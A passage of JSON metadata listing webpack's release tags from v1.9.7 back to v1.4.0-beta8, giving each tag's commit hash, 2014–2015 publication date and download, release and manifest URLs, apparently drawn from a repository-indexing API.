88fd845e87","kind":"tag","published_at":"2015-05-17T17:18:22.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.9.7","html_url":"https://github.com/webpack/webpack/releases/tag/v1.9.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.9.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.7/manifests"},{"name":"v1.9.6","sha":"c5eceb0b2cf31fca84e724d3893d44c7042b9038","kind":"tag","published_at":"2015-05-15T15:24:37.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.9.6","html_url":"https://github.com/webpack/webpack/releases/tag/v1.9.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.9.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.6/manifests"},{"name":"v1.9.5","sha":"e37a50683f74d6996373186db757289256a41bf7","kind":"tag","published_at":"2015-05-12T19:21:15.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.9.5","html_url":"https://github.com/webpack/webpack/releases/tag/v1.9.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.9.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.5/manifests"},{"name":"v1.9.4","sha":"ac84ef731540635f615438cc8f4424ff63003ce1","kind":"tag","published_at":"2015-05-10T16:45:42.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.9.4","html_url":"https://github.com/webpack/webpack/releases/tag/v1.9.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.9.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.4/manifests"},{"name":"v1.9.3","sha":"c7ac77fc907950dcf0dc355fae86164f688f9857","kind":"tag","published_at":"2015-05-10T14:44:05.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.9.3","html_url":"https://github.com/webpack/webpack/releases/tag/v1.9.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.9.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.3/manifests"},{"name":"v1.9.2","sha":"0576143e96be118e4621f79db4b8d03b6d2c808e","kind":"tag","published_at":"2015-05-10T12:37:27.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.9.2","html_url":"https://github.com/webpack/webpack/releases/tag/v1.9.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.9.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.2/manifests"},{"name":"v1.9.1","sha":"98663e71dbacfb82e02379671a821a373150dc7c","kind":"tag","published_at":"2015-05-10T11:53:12.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.9.1","html_url":"https://github.com/webpack/webpack/releases/tag/v1.9.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.9.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.1/manifests"},{"name":"v1.9.0","sha":"0e21e6ec0b2e4ebc085c9e6ccf823480384e3943","kind":"tag","published_at":"2015-05-10T10:23:07.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.9.0","html_url":"https://github.com/webpack/webpack/releases/tag/v1.9.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.9.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.0/manifests"},{"name":"v1.8.11","sha":"f7d7d30ee647dd8fc77972752d5b9fc47bbe09ea","kind":"tag","published_at":"2015-04-29T10:49:18.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.8.11","html_url":"https://github.com/webpack/webpack/releases/tag/v1.8.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.8.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.11/manifests"},{"name":"v1.8.10","sha":"8e490bdee33dd4edea82c6d13ba80c6fe3246218","kind":"tag","published_at":"2015-04-26T20:50:09.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.8.10","html_url":"https://github.com/webpack/webpack/releases/tag/v1.8.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.8.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.10/manifests"},{"name":"v1.8.9","sha":"e4453c78edb4613804c0c0a0e9f447d2def533c3","kind":"tag","published_at":"2015-04-21T21:34:18.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.8.9","html_url":"https://github.com/webpack/webpack/releases/tag/v1.8.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.8.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.9/manifests"},{"name":"v1.8.8","sha":"924e02c98aba21b65d913a1f0e16d8818f018c3b","kind":"tag","published_at":"2015-04-21T06:38:12.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.8.8","html_url":"https://github.com/webpack/webpack/releases/tag/v1.8.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.8.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.8/manifests"},{"name":"v1.8.7","sha":"0bc887a06c7f34a95e2756097f193f15ec1a443d","kind":"tag","published_at":"2015-04-20T18:51:10.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.8.7","html_url":"https://github.com/webpack/webpack/releases/tag/v1.8.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.8.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.7/manifests"},{"name":"v1.8.6","sha":"a27641f8cc68ec557d9ca524afbbfb3b34ec2408","kind":"tag","published_at":"2015-04-20T17:46:56.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.8.6","html_url":"https://github.com/webpack/webpack/releases/tag/v1.8.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.8.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.6/manifests"},{"name":"v1.8.5","sha":"53a534663446bfaa8fc4b3c202542d6a8a2aaadc","kind":"tag","published_at":"2015-04-17T08:26:19.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.8.5","html_url":"https://github.com/webpack/webpack/releases/tag/v1.8.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.8.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.5/manifests"},{"name":"v1.8.4","sha":"bffe6037e99c7a741d64414368295b026d81c81a","kind":"tag","published_at":"2015-04-10T08:23:50.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.8.4","html_url":"https://github.com/webpack/webpack/releases/tag/v1.8.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.8.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.4/manifests"},{"name":"v1.8.3","sha":"13c3a3c3445ac9b76f3fe2602963e8748673b458","kind":"tag","published_at":"2015-04-09T22:19:15.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.8.3","html_url":"https://github.com/webpack/webpack/releases/tag/v1.8.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.8.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.3/manifests"},{"name":"v1.7.4","sha":"43a12294470d9e0337a325095e0fd4a3669ed6c6","kind":"tag","published_at":"2015-04-09T22:14:30.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.7.4","html_url":"https://github.com/webpack/webpack/releases/tag/v1.7.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.7.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.7.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.7.4/manifests"},{"name":"v1.8.2","sha":"4c2b7a9ea5b45481ad408c8275ef58e6140a038f","kind":"tag","published_at":"2015-04-08T13:12:08.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.8.2","html_url":"https://github.com/webpack/webpack/releases/tag/v1.8.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.8.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.2/manifests"},{"name":"v1.8.1","sha":"af22dce84cb13facf372f179a6a174cafa0397dd","kind":"tag","published_at":"2015-04-08T06:11:10.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.8.1","html_url":"https://github.com/webpack/webpack/releases/tag/v1.8.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.8.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.1/manifests"},{"name":"v1.8.0","sha":"1f74f58273ae008e315275c6caa31ae3fad42551","kind":"tag","published_at":"2015-04-07T12:34:24.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.8.0","html_url":"https://github.com/webpack/webpack/releases/tag/v1.8.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.8.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.0/manifests"},{"name":"v1.7.3","sha":"b1da5ed5c69f02cb9a4215a56157267b1de9a11b","kind":"commit","published_at":"2015-03-11T22:50:37.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.7.3","html_url":"https://github.com/webpack/webpack/releases/tag/v1.7.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.7.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.7.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.7.3/manifests"},{"name":"v1.7.2","sha":"17d9dc161c7c8f969d83cb8503fead40db9798d9","kind":"commit","published_at":"2015-03-04T06:45:40.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.7.2","html_url":"https://github.com/webpack/webpack/releases/tag/v1.7.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.7.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.7.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.7.2/manifests"},{"name":"v1.7.1","sha":"d09c8e713823c705cefea77bc34db6ab0e1cc0c3","kind":"commit","published_at":"2015-03-03T22:41:41.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.7.1","html_url":"https://github.com/webpack/webpack/releases/tag/v1.7.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.7.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.7.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.7.1/manifests"},{"name":"v1.7.0","sha":"e5b5fa6da79def97ac6c1017f3595fcefd5a74dd","kind":"commit","published_at":"2015-03-03T19:43:18.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.7.0","html_url":"https://github.com/webpack/webpack/releases/tag/v1.7.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.7.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.7.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.7.0/manifests"},{"name":"v1.6.0","sha":"ad81998305456c8447ce09d5ef2d4c950f7a4184","kind":"commit","published_at":"2015-02-23T22:02:27.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.6.0","html_url":"https://github.com/webpack/webpack/releases/tag/v1.6.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.6.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.6.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.6.0/manifests"},{"name":"v1.5.3","sha":"e46e5cbc514b17cc893dde394edc9a8a25baa5eb","kind":"commit","published_at":"2015-01-21T19:27:32.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.5.3","html_url":"https://github.com/webpack/webpack/releases/tag/v1.5.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.5.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.5.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.5.3/manifests"},{"name":"v1.5.2","sha":"bdabadf34f871fd19b1f960df6b8ab15ea915154","kind":"commit","published_at":"2015-01-21T19:25:39.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.5.2","html_url":"https://github.com/webpack/webpack/releases/tag/v1.5.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.5.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.5.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.5.2/manifests"},{"name":"v1.5.1","sha":"558ee89277d41529ff143af8e050f4c2917ea4b6","kind":"commit","published_at":"2015-01-17T23:50:32.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.5.1","html_url":"https://github.com/webpack/webpack/releases/tag/v1.5.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.5.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.5.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.5.1/manifests"},{"name":"v1.5.0","sha":"0e36e7e936b126dba526bddac557566ee982c432","kind":"commit","published_at":"2015-01-17T22:43:53.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.5.0","html_url":"https://github.com/webpack/webpack/releases/tag/v1.5.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.5.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.5.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.5.0/manifests"},{"name":"v1.4.15","sha":"431bd659be6dcd35fbe993a3a528d5774e82f745","kind":"commit","published_at":"2014-12-28T00:26:41.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.15","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.15","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.15","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.15","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.15/manifests"},{"name":"v1.4.14","sha":"6c45e24e4039f7298bfa8ca08a9614abc7aeaf08","kind":"commit","published_at":"2014-12-22T14:29:04.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.14","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.14","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.14","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.14","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.14/manifests"},{"name":"v1.4.13","sha":"34c509740b722ac9898ed262f88a8bba9d3237b7","kind":"commit","published_at":"2014-11-05T23:28:35.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.13","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.13","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.13","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.13","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.13/manifests"},{"name":"v1.4.12","sha":"5edcaea76d900134a50e5a16a07ab5da75c80c6a","kind":"commit","published_at":"2014-11-03T07:10:16.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.12","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.12/manifests"},{"name":"v1.4.11","sha":"8c606b490b248000466cc5be01019ce7d2eea407","kind":"commit","published_at":"2014-11-02T12:18:27.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.11","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.11/manifests"},{"name":"v1.4.10","sha":"9a375a770a9b1b235361dcda92844acad196dd47","kind":"commit","published_at":"2014-10-31T11:46:35.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.10","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.10/manifests"},{"name":"v1.4.9","sha":"b02ef8b2c386d34441af4b42aab248aeed014214","kind":"commit","published_at":"2014-10-26T10:19:43.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.9","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.9/manifests"},{"name":"v1.4.8","sha":"c6e1a8fb6d8714dec5bd05b7a6ae80b71b6e0262","kind":"commit","published_at":"2014-10-16T20:31:42.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.8","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.8/manifests"},{"name":"v1.4.7","sha":"4c0e1974e5c49ee4063cf301d49dc977f77a85b6","kind":"commit","published_at":"2014-10-13T14:10:39.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.7","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.7/manifests"},{"name":"v1.4.6","sha":"f0997230f35361ab62c2300133aece93f3ca1cc3","kind":"commit","published_at":"2014-10-12T10:30:44.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.6","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.6/manifests"},{"name":"v1.4.5","sha":"272d7219cdec5f041e98e2163078c6d2ea772bdf","kind":"commit","published_at":"2014-10-07T13:56:58.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.5","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.5/manifests"},{"name":"v1.4.4","sha":"2bcb6f9bca77d5d4a42efface7c1e274412b5b64","kind":"commit","published_at":"2014-09-26T06:54:48.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.4","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.4/manifests"},{"name":"v1.4.3","sha":"91c7426e4595f0d3c45efc9c1e17b40d875e6de2","kind":"commit","published_at":"2014-09-23T06:43:32.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.3","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.3/manifests"},{"name":"v1.4.2","sha":"c117ec46eaa149d3732157744467e58b2baf4517","kind":"commit","published_at":"2014-09-22T21:51:09.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.2","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.2/manifests"},{"name":"v1.4.1-beta1","sha":"c59727720e4bf1feb5a1939b69154ceec0111ed0","kind":"commit","published_at":"2014-09-19T06:13:52.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.1-beta1","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.1-beta1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.1-beta1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.1-beta1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.1-beta1/manifests"},{"name":"v1.4.0-beta10","sha":"4afdc81bc4fa95fad705957f335ab48c6f7feb9a","kind":"commit","published_at":"2014-09-17T21:25:33.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.0-beta10","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.0-beta10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.0-beta10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta10/manifests"},{"name":"v1.4.0-beta9","sha":"4e79c9f245c3df0173cb75312cde5f1c51c902f6","kind":"commit","published_at":"2014-09-16T17:36:12.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.0-beta9","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.0-beta9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.0-beta9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta9/manifests"},{"name":"v1.4.0-beta8","sha":"bd02534a588b4ddc2893b5d222836f7c8df8447e","kind":"commit","published_at":"2014-09-15T11:33:17.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1